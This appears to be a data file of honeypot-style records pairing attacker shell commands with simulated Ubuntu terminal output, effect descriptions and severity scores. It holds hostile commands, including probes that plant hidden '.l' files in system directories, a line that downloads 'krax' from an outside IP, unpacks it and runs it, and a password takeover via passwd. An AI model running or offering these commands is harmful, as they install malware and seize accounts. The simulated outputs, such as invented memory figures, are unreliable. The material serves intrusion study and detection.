>/dev/netslink/.l && cd /dev/netslink/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/# >/dev/netslink/.l && cd /dev/netslink/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/dev/netslink#
The terminal created a new file '.l' in the '/dev/netslink' directory and changed the working directory to '/dev/netslink'. The terminal then echoed the string 'PATH_DONE'.
2
curated_ubuntu
c6f29bc7f89d
2021_2022
8
>/dev/shm/.l && cd /dev/shm/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/dev/netslink# >/dev/shm/.l && cd /dev/shm/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/dev/shm#
The terminal created a new file '.l' in the '/dev/shm' directory and changed the working directory to '/dev/shm'. The terminal then echoed the string 'PATH_DONE'.
2
curated_ubuntu
c6f29bc7f89d
2021_2022
9
>/bin/.l && cd /bin/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/dev/shm# >/bin/.l && cd /bin/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/bin#
The terminal created a new file '.l' in the '/bin' directory and changed the working directory to '/bin'. The terminal then echoed the string 'PATH_DONE'.
2
curated_ubuntu
c6f29bc7f89d
2021_2022
10
>/etc/.l && cd /etc/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/bin# >/etc/.l && cd /etc/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/etc#
The terminal created a new file '.l' in the '/etc' directory and changed the working directory to '/etc'. The terminal then echoed the string 'PATH_DONE'.
2
curated_ubuntu
c6f29bc7f89d
2021_2022
11
>/boot/.l && cd /boot/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/etc# >/boot/.l && cd /boot/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/boot#
The terminal created a new file '.l' in the '/boot' directory and changed the working directory to '/boot'. The terminal then echoed the string 'PATH_DONE'.
2
curated_ubuntu
c6f29bc7f89d
2021_2022
12
>/usr/.l && cd /usr/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/boot# >/usr/.l && cd /usr/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/usr#
The terminal created a new file '.l' in the '/usr' directory and changed the working directory to '/usr'. The terminal then echoed the string 'PATH_DONE'.
2
curated_ubuntu
c6f29bc7f89d
2021_2022
13
>/sys/.l && cd /sys/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/usr# >/sys/.l && cd /sys/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/sys#
The terminal created a new file '.l' in the '/sys' directory and changed the working directory to '/sys'. The terminal then echoed the string 'PATH_DONE'.
2
curated_ubuntu
c6f29bc7f89d
2021_2022
14
wget 2>&1;curl 2>&1;ftpget 2>&1
root@ubuntu:/sys# wget 2>&1 wget: missing URL Usage: wget [OPTION]... [URL]... Try `wget --help' for more options. root@ubuntu:/sys# curl 2>&1 curl: try 'curl --help' or 'curl --manual' for more information root@ubuntu:/sys# ftpget 2>&1 BusyBox v1.30.1 (Ubuntu 1:1.30.1-4ubuntu2.3) multi-call binary. Usage: ftpget [OP...
The terminal executed the 'wget', 'curl', and 'ftpget' commands without any arguments, which resulted in the display of their respective usage instructions.
0
curated_ubuntu
dd4d09695cd7
2021_2022
0
uname -a
root@ubuntu:~# uname -a Linux user 5.4.0-159-generic #176-Ubuntu SMP Wed Oct 13 16:45:01 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
dd4d09695cd7
2021_2022
1
cd /dev/shm || cd /tmp || cd /var/run || cd /mnt; wget 198.98.56.65/krax || curl -o krax 198.98.56.65/krax; tar xvf krax; cd ._lul; chmod +x *; ./krn; ./krane oracle
root@ubuntu:~# cd /dev/shm || cd /tmp || cd /var/run || cd /mnt root@ubuntu:/dev/shm# wget 198.98.56.65/krax --2023-11-27 22:01:34-- http://198.98.56.65/krax Connecting to 198.98.56.65:80... connected. HTTP request sent, awaiting response... 200 OK Length: 28 [application/x-sh] Saving to: ‘krax’ 100%[================...
- The terminal changed the working directory to '/dev/shm'. - A file named 'krax' was downloaded from the server with IP '198.98.56.65'. - The 'krax' file was extracted to a directory named '._lul'. - All files in the '._lul' directory were given execute permissions. - Two files, 'krn' and 'krane', were executed in th...
3
curated_ubuntu
48766cfc71ee
2021_2022
0
cat /proc/cpuinfo | grep name | wc -l
root@ubuntu:~# cat /proc/cpuinfo | grep name | wc -l 24 root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
48766cfc71ee
2021_2022
1
echo -e "123456\n2xmNoWLJ3wIr\n2xmNoWLJ3wIr"|passwd|bash
root@ubuntu:~# echo -e "123456\n2xmNoWLJ3wIr\n2xmNoWLJ3wIr"|passwd|bash New password: Retype new password: passwd: password updated successfully root@ubuntu:~#
The password for the current user has been changed to '2xmNoWLJ3wIr'.
4
curated_ubuntu
48766cfc71ee
2021_2022
2
echo "123456\n2xmNoWLJ3wIr\n2xmNoWLJ3wIr\n"|passwd
root@ubuntu:~# echo "123456\n2xmNoWLJ3wIr\n2xmNoWLJ3wIr\n"|passwd New password: Retype new password: passwd: password updated successfully root@ubuntu:~#
The password for the current user has been changed again.
4
curated_ubuntu
48766cfc71ee
2021_2022
3
cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
root@ubuntu:~# cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Intel(R) Xeon(R) Silver 4214 CPU @ 2.20GHz root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
48766cfc71ee
2021_2022
4
free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
root@ubuntu:~# free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' 725938364 123456 234567 345678 456789 567890 root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
48766cfc71ee
2021_2022
5
ls -lh $(which ls)
root@ubuntu:~# ls -lh $(which ls) -rwxr-xr-x 1 root root 129K Jan 18 2023 /bin/ls root@ubuntu:~#
No changes to the system.
0
curated_ubuntu